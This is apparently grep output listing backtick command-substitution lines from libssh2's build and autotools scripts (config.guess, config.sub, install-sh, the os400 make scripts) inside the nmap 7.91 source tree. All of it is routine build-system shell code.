nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh:6:SCRIPTDIR=`dirname "${0}"`
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh-7-. "${SCRIPTDIR}/initscript.sh"
##############################################
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh-24-for HFILE in *.rpgle *.rpgle.in
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh:25:do      NAME="`basename \"${HFILE}\" .in`"
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh:26:        VAR="`basename \"${NAME}\" .rpgle`"
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh:27:        VAL="`db2_name \"${NAME}\"`"
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh-28-
##############################################
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh-64-        DB2CMD="change_include < \"${HFILE}\""
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh:65:        IFSFILE="`basename \"${HFILE}\" .in`"
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh-66-
##############################################
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh-79-
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh:80:        eval DB2MBR="\"\${VAR_`basename \"${IFSDEST}\" .rpgle`}\""
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh-81-        DB2DEST="${SRCPF}/${DB2MBR}.MBR"
##############################################
nmap-7.91+dfsg1/libssh2/os400/make-src.sh-5-
nmap-7.91+dfsg1/libssh2/os400/make-src.sh:6:SCRIPTDIR=`dirname "${0}"`
nmap-7.91+dfsg1/libssh2/os400/make-src.sh-7-. "${SCRIPTDIR}/initscript.sh"
##############################################
nmap-7.91+dfsg1/libssh2/os400/make-src.sh-101-           ${CSOURCES} ${CRYPTO_CSOURCES} macros.c
nmap-7.91+dfsg1/libssh2/os400/make-src.sh:102:do      MODULE=`db2_name "${SRC}"`
nmap-7.91+dfsg1/libssh2/os400/make-src.sh-103-        make_module "${MODULE}" "${SRC}"
##############################################
nmap-7.91+dfsg1/libssh2/os400/make.sh-7-
nmap-7.91+dfsg1/libssh2/os400/make.sh:8:SCRIPTDIR=`dirname "${0}"`
nmap-7.91+dfsg1/libssh2/os400/make.sh-9-. "${SCRIPTDIR}/initscript.sh"
##############################################
nmap-7.91+dfsg1/libssh2/os400/make.sh-34-    "${TOPDIR}/docs/BINDINGS"
nmap-7.91+dfsg1/libssh2/os400/make.sh:35:do      MEMBER="${LIBIFSNAME}/DOCS.FILE/`db2_name \"${TEXT}\"`.MBR"
nmap-7.91+dfsg1/libssh2/os400/make.sh-36-
##############################################
nmap-7.91+dfsg1/libssh2/os400/make-include.sh-5-
nmap-7.91+dfsg1/libssh2/os400/make-include.sh:6:SCRIPTDIR=`dirname "${0}"`
nmap-7.91+dfsg1/libssh2/os400/make-include.sh-7-. "${SCRIPTDIR}/initscript.sh"
##############################################
nmap-7.91+dfsg1/libssh2/os400/make-include.sh-47-for HFILE in *.h "${TOPDIR}/os400/libssh2_ccsid.h"
nmap-7.91+dfsg1/libssh2/os400/make-include.sh:48:do      DEST="${SRCPF}/`db2_name \"${HFILE}\"`.MBR"
nmap-7.91+dfsg1/libssh2/os400/make-include.sh-49-
##############################################
nmap-7.91+dfsg1/libssh2/os400/make-include.sh-51-        then    copy_hfile "${DEST}" "${HFILE}"
nmap-7.91+dfsg1/libssh2/os400/make-include.sh:52:                IFSDEST="${IFSINCLUDE}/`basename \"${HFILE}\"`"
nmap-7.91+dfsg1/libssh2/os400/make-include.sh-53-                rm -f "${IFSDEST}"
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-34-
nmap-7.91+dfsg1/libssh2/config.guess:35:me=`echo "$0" | sed -e 's,.*/,,'`
nmap-7.91+dfsg1/libssh2/config.guess-36-
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-102-: ${TMPDIR=/tmp} ;
nmap-7.91+dfsg1/libssh2/config.guess:103: { tmp=`(umask 077 && mktemp -d "$TMPDIR/cgXXXXXX") 2>/dev/null` && test -n "$tmp" && test -d "$tmp" ; } ||
nmap-7.91+dfsg1/libssh2/config.guess-104- { test -n "$RANDOM" && tmp=$TMPDIR/cg$$-$RANDOM && (umask 077 && mkdir $tmp) ; } ||
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-151-	EOF
nmap-7.91+dfsg1/libssh2/config.guess:152:	eval "`$CC_FOR_BUILD -E "$dummy.c" 2>/dev/null | grep '^LIBC' | sed 's, ,,g'`"
nmap-7.91+dfsg1/libssh2/config.guess-153-
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-188-	    earmv*)
nmap-7.91+dfsg1/libssh2/config.guess:189:		arch=`echo "$UNAME_MACHINE_ARCH" | sed -e 's,^e\(armv[0-9]\).*$,\1,'`
nmap-7.91+dfsg1/libssh2/config.guess:190:		endian=`echo "$UNAME_MACHINE_ARCH" | sed -ne 's,^.*\(eb\)$,\1,p'`
nmap-7.91+dfsg1/libssh2/config.guess-191-		machine="${arch}${endian}"-unknown
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-220-		expr='s/^earmv[0-9]/-eabi/;s/eb$//'
nmap-7.91+dfsg1/libssh2/config.guess:221:		abi=`echo "$UNAME_MACHINE_ARCH" | sed -e "$expr"`
nmap-7.91+dfsg1/libssh2/config.guess-222-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-233-	    *)
nmap-7.91+dfsg1/libssh2/config.guess:234:		release=`echo "$UNAME_RELEASE" | sed -e 's/[-_].*//' | cut -d. -f1,2`
nmap-7.91+dfsg1/libssh2/config.guess-235-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-280-	*4.0)
nmap-7.91+dfsg1/libssh2/config.guess:281:		UNAME_RELEASE=`/usr/sbin/sizer -v | awk '{print $3}'`
nmap-7.91+dfsg1/libssh2/config.guess-282-		;;
nmap-7.91+dfsg1/libssh2/config.guess-283-	*5.*)
nmap-7.91+dfsg1/libssh2/config.guess:284:		UNAME_RELEASE=`/usr/sbin/sizer -v | awk '{print $4}'`
nmap-7.91+dfsg1/libssh2/config.guess-285-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-290-	# types through head -n 1, so we only detect the type of CPU 0.
nmap-7.91+dfsg1/libssh2/config.guess:291:	ALPHA_CPU_TYPE=`/usr/sbin/psrinfo -v | sed -n -e 's/^  The alpha \(.*\) processor.*$/\1/p' | head -n 1`
nmap-7.91+dfsg1/libssh2/config.guess-292-	case "$ALPHA_CPU_TYPE" in
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-328-	# 1.2 uses "1.2" for uname -r.
nmap-7.91+dfsg1/libssh2/config.guess:329:	echo "$UNAME_MACHINE"-dec-osf"`echo "$UNAME_RELEASE" | sed -e 's/^[PVTX]//' | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz`"
nmap-7.91+dfsg1/libssh2/config.guess-330-	# Reset EXIT trap before exiting to avoid spurious non-zero exit code.
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-379-    s390x:SunOS:*:*)
nmap-7.91+dfsg1/libssh2/config.guess:380:	echo "$UNAME_MACHINE"-ibm-solaris2"`echo "$UNAME_RELEASE" | sed -e 's/[^.]*//'`"
nmap-7.91+dfsg1/libssh2/config.guess-381-	exit ;;
nmap-7.91+dfsg1/libssh2/config.guess-382-    sun4H:SunOS:5.*:*)
nmap-7.91+dfsg1/libssh2/config.guess:383:	echo sparc-hal-solaris2"`echo "$UNAME_RELEASE"|sed -e 's/[^.]*//'`"
nmap-7.91+dfsg1/libssh2/config.guess-384-	exit ;;
nmap-7.91+dfsg1/libssh2/config.guess-385-    sun4*:SunOS:5.*:* | tadpole*:SunOS:5.*:*)
nmap-7.91+dfsg1/libssh2/config.guess:386:	echo sparc-sun-solaris2"`echo "$UNAME_RELEASE" | sed -e 's/[^.]*//'`"
nmap-7.91+dfsg1/libssh2/config.guess-387-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-404-	fi
nmap-7.91+dfsg1/libssh2/config.guess:405:	echo "$SUN_ARCH"-pc-solaris2"`echo "$UNAME_RELEASE"|sed -e 's/[^.]*//'`"
nmap-7.91+dfsg1/libssh2/config.guess-406-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-410-	# it's likely to be more like Solaris than SunOS4.
nmap-7.91+dfsg1/libssh2/config.guess:411:	echo sparc-sun-solaris3"`echo "$UNAME_RELEASE"|sed -e 's/[^.]*//'`"
nmap-7.91+dfsg1/libssh2/config.guess-412-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-419-	# Japanese Language versions have a version number like `4.1.3-JL'.
nmap-7.91+dfsg1/libssh2/config.guess:420:	echo sparc-sun-sunos"`echo "$UNAME_RELEASE"|sed -e 's/-/_/'`"
nmap-7.91+dfsg1/libssh2/config.guess-421-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-425-    sun*:*:4.2BSD:*)
nmap-7.91+dfsg1/libssh2/config.guess:426:	UNAME_RELEASE=`(sed 1q /etc/motd | awk '{print substr($5,1,3)}') 2>/dev/null`
nmap-7.91+dfsg1/libssh2/config.guess-427-	test "x$UNAME_RELEASE" = x && UNAME_RELEASE=3
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-507-	$CC_FOR_BUILD -o "$dummy" "$dummy.c" &&
nmap-7.91+dfsg1/libssh2/config.guess:508:	  dummyarg=`echo "$UNAME_RELEASE" | sed -n 's/\([0-9]*\).*/\1/p'` &&
nmap-7.91+dfsg1/libssh2/config.guess:509:	  SYSTEM_NAME=`"$dummy" "$dummyarg"` &&
nmap-7.91+dfsg1/libssh2/config.guess-510-	    { echo "$SYSTEM_NAME"; exit; }
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-563-    *:IRIX*:*:*)
nmap-7.91+dfsg1/libssh2/config.guess:564:	echo mips-sgi-irix"`echo "$UNAME_RELEASE"|sed -e 's/-/_/g'`"
nmap-7.91+dfsg1/libssh2/config.guess-565-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-593-EOF
nmap-7.91+dfsg1/libssh2/config.guess:594:		if $CC_FOR_BUILD -o "$dummy" "$dummy.c" && SYSTEM_NAME=`"$dummy"`
nmap-7.91+dfsg1/libssh2/config.guess-595-		then
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-606-    *:AIX:*:[4567])
nmap-7.91+dfsg1/libssh2/config.guess:607:	IBM_CPU_ID=`/usr/sbin/lsdev -C -c processor -S available | sed 1q | awk '{ print $1 }'`
nmap-7.91+dfsg1/libssh2/config.guess-608-	if /usr/sbin/lsattr -El "$IBM_CPU_ID" | grep ' POWER' >/dev/null 2>&1; then
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-642-    9000/[34678]??:HP-UX:*:*)
nmap-7.91+dfsg1/libssh2/config.guess:643:	HPUX_REV=`echo "$UNAME_RELEASE"|sed -e 's/[^.]*.[0B]*//'`
nmap-7.91+dfsg1/libssh2/config.guess-644-	case "$UNAME_MACHINE" in
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-696-EOF
nmap-7.91+dfsg1/libssh2/config.guess:697:		    (CCOPTS="" $CC_FOR_BUILD -o "$dummy" "$dummy.c" 2>/dev/null) && HP_ARCH=`"$dummy"`
nmap-7.91+dfsg1/libssh2/config.guess-698-		    test -z "$HP_ARCH" && HP_ARCH=hppa
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-724-    ia64:HP-UX:*:*)
nmap-7.91+dfsg1/libssh2/config.guess:725:	HPUX_REV=`echo "$UNAME_RELEASE"|sed -e 's/[^.]*.[0B]*//'`
nmap-7.91+dfsg1/libssh2/config.guess-726-	echo ia64-hp-hpux"$HPUX_REV"
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-754-EOF
nmap-7.91+dfsg1/libssh2/config.guess:755:	$CC_FOR_BUILD -o "$dummy" "$dummy.c" && SYSTEM_NAME=`"$dummy"` &&
nmap-7.91+dfsg1/libssh2/config.guess-756-		{ echo "$SYSTEM_NAME"; exit; }
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-825-	FUJITSU_SYS=`uname -p | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/\///'`
nmap-7.91+dfsg1/libssh2/config.guess:826:	FUJITSU_REL=`echo "$UNAME_RELEASE" | sed -e 's/ /_/'`
nmap-7.91+dfsg1/libssh2/config.guess-827-	echo "${FUJITSU_PROC}-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-830-	FUJITSU_SYS=`uname -p | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/\///'`
nmap-7.91+dfsg1/libssh2/config.guess:831:	FUJITSU_REL=`echo "$UNAME_RELEASE" | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/ /_/'`
nmap-7.91+dfsg1/libssh2/config.guess-832-	echo "sparc-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-850-	esac
nmap-7.91+dfsg1/libssh2/config.guess:851:	echo "$UNAME_PROCESSOR"-unknown-freebsd"`echo "$UNAME_RELEASE"|sed -e 's/[-(].*//'`"
nmap-7.91+dfsg1/libssh2/config.guess-852-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-886-    prep*:SunOS:5.*:*)
nmap-7.91+dfsg1/libssh2/config.guess:887:	echo powerpcle-unknown-solaris2"`echo "$UNAME_RELEASE"|sed -e 's/[^.]*//'`"
nmap-7.91+dfsg1/libssh2/config.guess-888-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-890-	# the GNU system
nmap-7.91+dfsg1/libssh2/config.guess:891:	echo "`echo "$UNAME_MACHINE"|sed -e 's,[-/].*$,,'`-unknown-$LIBC`echo "$UNAME_RELEASE"|sed -e 's,/.*$,,'`"
nmap-7.91+dfsg1/libssh2/config.guess-892-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-894-	# other systems with GNU libc and userland
nmap-7.91+dfsg1/libssh2/config.guess:895:	echo "$UNAME_MACHINE-unknown-`echo "$UNAME_SYSTEM" | sed 's,^[^/]*/,,' | tr "[:upper:]" "[:lower:]"``echo "$UNAME_RELEASE"|sed -e 's/[-(].*//'`-$LIBC"
nmap-7.91+dfsg1/libssh2/config.guess-896-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-988-EOF
nmap-7.91+dfsg1/libssh2/config.guess:989:	eval "`$CC_FOR_BUILD -E "$dummy.c" 2>/dev/null | grep '^CPU'`"
nmap-7.91+dfsg1/libssh2/config.guess-990-	test "x$CPU" != x && { echo "$CPU-unknown-linux-$LIBC"; exit; }
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-1092-    i*86:*:4.*:*)
nmap-7.91+dfsg1/libssh2/config.guess:1093:	UNAME_REL=`echo "$UNAME_RELEASE" | sed 's/\/MP$//'`
nmap-7.91+dfsg1/libssh2/config.guess-1094-	if grep Novell /usr/include/link.h >/dev/null 2>/dev/null; then
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-1295-	fi
nmap-7.91+dfsg1/libssh2/config.guess:1296:	if test "`echo "$UNAME_RELEASE" | sed -e 's/\..*//'`" -le 10 ; then
nmap-7.91+dfsg1/libssh2/config.guess-1297-	    if [ "$CC_FOR_BUILD" != no_compiler_found ]; then
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-1393-    *:DragonFly:*:*)
nmap-7.91+dfsg1/libssh2/config.guess:1394:	echo "$UNAME_MACHINE"-unknown-dragonfly"`echo "$UNAME_RELEASE"|sed -e 's/[-(].*//'`"
nmap-7.91+dfsg1/libssh2/config.guess-1395-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.guess-1406-    i*86:skyos:*:*)
nmap-7.91+dfsg1/libssh2/config.guess:1407:	echo "$UNAME_MACHINE"-pc-skyos"`echo "$UNAME_RELEASE" | sed -e 's/ .*$//'`"
nmap-7.91+dfsg1/libssh2/config.guess-1408-	exit ;;
##############################################
nmap-7.91+dfsg1/libssh2/depcomp-64-  case $1 in
nmap-7.91+dfsg1/libssh2/depcomp:65:    */*) dir=`echo "$1" | sed -e 's|/[^/]*$|/|'`;;
nmap-7.91+dfsg1/libssh2/depcomp-66-      *) dir=;;
##############################################
nmap-7.91+dfsg1/libssh2/depcomp-73-{
nmap-7.91+dfsg1/libssh2/depcomp:74:  base=`echo "$1" | sed -e 's|^.*/||' -e 's/\.[^.]*$//'`
nmap-7.91+dfsg1/libssh2/depcomp-75-}
##############################################
nmap-7.91+dfsg1/libssh2/depcomp-126-  sed 's|[^\\/]*$|'${DEPDIR-.deps}'/&|;s|\.\([^.]*\)$|.P\1|;s|Pobj$|Po|'`}
nmap-7.91+dfsg1/libssh2/depcomp:127:tmpdepfile=${tmpdepfile-`echo "$depfile" | sed 's/\.\([^.]*\)$/.T\1/'`}
nmap-7.91+dfsg1/libssh2/depcomp-128-
##############################################
nmap-7.91+dfsg1/libssh2/depcomp-405-        sleep 1
nmap-7.91+dfsg1/libssh2/depcomp:406:        i=`expr $i - 1`
nmap-7.91+dfsg1/libssh2/depcomp-407-      done
nmap-7.91+dfsg1/libssh2/depcomp-408-    fi
nmap-7.91+dfsg1/libssh2/depcomp:409:    i=`expr $i - 1`
nmap-7.91+dfsg1/libssh2/depcomp-410-  done
##############################################
nmap-7.91+dfsg1/libssh2/depcomp-425-  # Do two passes, one to just change these to
nmap-7.91+dfsg1/libssh2/depcomp:426:  # `$object: dependent.h' and one to simply `dependent.h:'.
nmap-7.91+dfsg1/libssh2/depcomp-427-  sed "s,^[^:]*:,$object :," < "$tmpdepfile" > "$depfile"
##############################################
nmap-7.91+dfsg1/libssh2/depcomp-659-  done
nmap-7.91+dfsg1/libssh2/depcomp:660:  obj_suffix=`echo "$object" | sed 's/^.*\././'`
nmap-7.91+dfsg1/libssh2/depcomp-661-  touch "$tmpdepfile"
##############################################
nmap-7.91+dfsg1/libssh2/configure.ac-18-dnl figure out the libssh2 version
nmap-7.91+dfsg1/libssh2/configure.ac:19:LIBSSH2VER=`$SED -ne 's/^#define LIBSSH2_VERSION *"\(.*\)"/\1/p' ${srcdir}/include/libssh2.h`
nmap-7.91+dfsg1/libssh2/configure.ac-20-AM_INIT_AUTOMAKE
##############################################
nmap-7.91+dfsg1/libssh2/configure.ac-65-
nmap-7.91+dfsg1/libssh2/configure.ac:66:# Solaris has inet_addr() in -lnsl.
nmap-7.91+dfsg1/libssh2/configure.ac-67-AC_SEARCH_LIBS(inet_addr, nsl)
##############################################
nmap-7.91+dfsg1/libssh2/buildconf-4-
nmap-7.91+dfsg1/libssh2/buildconf:5:if [ "x`which $LIBTOOLIZE`" = "x" ]; then
nmap-7.91+dfsg1/libssh2/buildconf-6-    LIBTOOLIZE="glibtoolize"
##############################################
nmap-7.91+dfsg1/libssh2/buildconf-8-
nmap-7.91+dfsg1/libssh2/buildconf:9:if [ "x`which $LIBTOOLIZE`" = "x" ]; then
nmap-7.91+dfsg1/libssh2/buildconf-10-    echo "Neither libtoolize nor glibtoolize could be found!"
##############################################
nmap-7.91+dfsg1/libssh2/acinclude.m4-43-       AC_MSG_CHECKING([gcc version])
nmap-7.91+dfsg1/libssh2/acinclude.m4:44:       gccver=`$CC -dumpversion`
nmap-7.91+dfsg1/libssh2/acinclude.m4:45:       num1=`echo $gccver | cut -d . -f1`
nmap-7.91+dfsg1/libssh2/acinclude.m4:46:       num2=`echo $gccver | cut -d . -f2`
nmap-7.91+dfsg1/libssh2/acinclude.m4:47:       gccnum=`(expr $num1 "*" 100 + $num2) 2>/dev/null`
nmap-7.91+dfsg1/libssh2/acinclude.m4-48-       AC_MSG_RESULT($gccver)
##############################################
nmap-7.91+dfsg1/libssh2/acinclude.m4-116-              dnl reliable on earlier gcc versions.
nmap-7.91+dfsg1/libssh2/acinclude.m4:117:              add=`echo $flag | sed 's/^-I/-isystem /g'`
nmap-7.91+dfsg1/libssh2/acinclude.m4-118-              WARN="$WARN $add"
##############################################
nmap-7.91+dfsg1/libssh2/maketgz-18-
nmap-7.91+dfsg1/libssh2/maketgz:19:major=`echo $libversion |cut -d. -f1 | sed -e "s/[^0-9]//g"`
nmap-7.91+dfsg1/libssh2/maketgz:20:minor=`echo $libversion |cut -d. -f2 | sed -e "s/[^0-9]//g"`
nmap-7.91+dfsg1/libssh2/maketgz:21:patch=`echo $libversion |cut -d. -f3 | cut -d- -f1 | sed -e "s/[^0-9]//g"`
nmap-7.91+dfsg1/libssh2/maketgz-22-
nmap-7.91+dfsg1/libssh2/maketgz:23:numeric=`perl -e 'printf("%02x%02x%02x\n", '"$major, $minor, $patch);"`
nmap-7.91+dfsg1/libssh2/maketgz-24-
##############################################
nmap-7.91+dfsg1/libssh2/maketgz-59-  file="$1"
nmap-7.91+dfsg1/libssh2/maketgz:60:  for part in `echo $PATH| tr ':' ' '`; do
nmap-7.91+dfsg1/libssh2/maketgz-61-    path="$part/$file"
##############################################
nmap-7.91+dfsg1/libssh2/install-sh-234-      fi
nmap-7.91+dfsg1/libssh2/install-sh:235:      cp_umask=`expr '(' 777 - $mode % 1000 ')' $u_plus_rw`;;
nmap-7.91+dfsg1/libssh2/install-sh-236-    *)
##############################################
nmap-7.91+dfsg1/libssh2/install-sh-280-      dstdir=$dst
nmap-7.91+dfsg1/libssh2/install-sh:281:      dstbase=`basename "$src"`
nmap-7.91+dfsg1/libssh2/install-sh-282-      case $dst in
##############################################
nmap-7.91+dfsg1/libssh2/install-sh-287-    else
nmap-7.91+dfsg1/libssh2/install-sh:288:      dstdir=`dirname "$dst"`
nmap-7.91+dfsg1/libssh2/install-sh-289-      test -d "$dstdir"
##############################################
nmap-7.91+dfsg1/libssh2/install-sh-354-                   test_tmpdir="$tmpdir/a"
nmap-7.91+dfsg1/libssh2/install-sh:355:                   ls_ld_tmpdir=`ls -ld "$test_tmpdir"`
nmap-7.91+dfsg1/libssh2/install-sh-356-                   case $ls_ld_tmpdir in
##############################################
nmap-7.91+dfsg1/libssh2/install-sh-361-                   $mkdirprog -m$different_mode -p -- "$test_tmpdir" && {
nmap-7.91+dfsg1/libssh2/install-sh:362:                     ls_ld_tmpdir_1=`ls -ld "$test_tmpdir"`
nmap-7.91+dfsg1/libssh2/install-sh-363-                     test "$ls_ld_tmpdir" = "$ls_ld_tmpdir_1"
##############################################
nmap-7.91+dfsg1/libssh2/install-sh-419-            case $prefix in
nmap-7.91+dfsg1/libssh2/install-sh:420:              *\'*) qprefix=`echo "$prefix" | sed "s/'/'\\\\\\\\''/g"`;;
nmap-7.91+dfsg1/libssh2/install-sh-421-              *) qprefix=$prefix;;
##############################################
nmap-7.91+dfsg1/libssh2/install-sh-468-    if $copy_on_change &&
nmap-7.91+dfsg1/libssh2/install-sh:469:       old=`LC_ALL=C ls -dlL "$dst"     2>/dev/null` &&
nmap-7.91+dfsg1/libssh2/install-sh:470:       new=`LC_ALL=C ls -dlL "$dsttmp"  2>/dev/null` &&
nmap-7.91+dfsg1/libssh2/install-sh-471-       set -f &&
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-52-
nmap-7.91+dfsg1/libssh2/config.sub:53:me=`echo "$0" | sed -e 's,.*/,,'`
nmap-7.91+dfsg1/libssh2/config.sub-54-
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-114-# Here we must recognize all the valid KERNEL-OS combinations.
nmap-7.91+dfsg1/libssh2/config.sub:115:maybe_os=`echo "$1" | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\2/'`
nmap-7.91+dfsg1/libssh2/config.sub-116-case $maybe_os in
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-122-    os=-$maybe_os
nmap-7.91+dfsg1/libssh2/config.sub:123:    basic_machine=`echo "$1" | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'`
nmap-7.91+dfsg1/libssh2/config.sub-124-    ;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-126-    os=-linux-android
nmap-7.91+dfsg1/libssh2/config.sub:127:    basic_machine=`echo "$1" | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'`-unknown
nmap-7.91+dfsg1/libssh2/config.sub-128-    ;;
nmap-7.91+dfsg1/libssh2/config.sub-129-  *)
nmap-7.91+dfsg1/libssh2/config.sub:130:    basic_machine=`echo "$1" | sed 's/-[^-]*$//'`
nmap-7.91+dfsg1/libssh2/config.sub-131-    if [ "$basic_machine" != "$1" ]
nmap-7.91+dfsg1/libssh2/config.sub:132:    then os=`echo "$1" | sed 's/.*-/-/'`
nmap-7.91+dfsg1/libssh2/config.sub-133-    else os=; fi
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-180-		os=-sco5v6
nmap-7.91+dfsg1/libssh2/config.sub:181:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-182-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-184-		os=-sco3.2v5
nmap-7.91+dfsg1/libssh2/config.sub:185:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-186-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-188-		os=-sco3.2v4
nmap-7.91+dfsg1/libssh2/config.sub:189:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-190-		;;
nmap-7.91+dfsg1/libssh2/config.sub-191-	-sco3.2.[4-9]*)
nmap-7.91+dfsg1/libssh2/config.sub:192:		os=`echo $os | sed -e 's/sco3.2./sco3.2v/'`
nmap-7.91+dfsg1/libssh2/config.sub:193:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-194-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-196-		# Don't forget version if it is 3.2v4 or newer.
nmap-7.91+dfsg1/libssh2/config.sub:197:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-198-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-200-		# Don't forget version if it is 3.2v4 or newer.
nmap-7.91+dfsg1/libssh2/config.sub:201:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-202-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-204-		os=-sco3.2v2
nmap-7.91+dfsg1/libssh2/config.sub:205:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-206-		;;
nmap-7.91+dfsg1/libssh2/config.sub-207-	-udk*)
nmap-7.91+dfsg1/libssh2/config.sub:208:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-209-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-211-		os=-isc2.2
nmap-7.91+dfsg1/libssh2/config.sub:212:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-213-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-217-	-isc*)
nmap-7.91+dfsg1/libssh2/config.sub:218:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-219-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-229-	-ptx*)
nmap-7.91+dfsg1/libssh2/config.sub:230:		basic_machine=`echo "$1" | sed -e 's/86-.*/86-sequent/'`
nmap-7.91+dfsg1/libssh2/config.sub-231-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-364-	*-*-*)
nmap-7.91+dfsg1/libssh2/config.sub:365:		echo Invalid configuration \`"$1"\': machine \`"$basic_machine"\' not recognized 1>&2
nmap-7.91+dfsg1/libssh2/config.sub-366-		exit 1
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-493-	amd64-*)
nmap-7.91+dfsg1/libssh2/config.sub:494:		basic_machine=x86_64-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-495-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-538-	blackfin-*)
nmap-7.91+dfsg1/libssh2/config.sub:539:		basic_machine=bfin-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-540-		os=-linux
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-546-	c54x-*)
nmap-7.91+dfsg1/libssh2/config.sub:547:		basic_machine=tic54x-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-548-		;;
nmap-7.91+dfsg1/libssh2/config.sub-549-	c55x-*)
nmap-7.91+dfsg1/libssh2/config.sub:550:		basic_machine=tic55x-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-551-		;;
nmap-7.91+dfsg1/libssh2/config.sub-552-	c6x-*)
nmap-7.91+dfsg1/libssh2/config.sub:553:		basic_machine=tic6x-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-554-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-650-	e500v[12]-*)
nmap-7.91+dfsg1/libssh2/config.sub:651:		basic_machine=powerpc-`echo "$basic_machine" | sed 's/^[^-]*-//'`
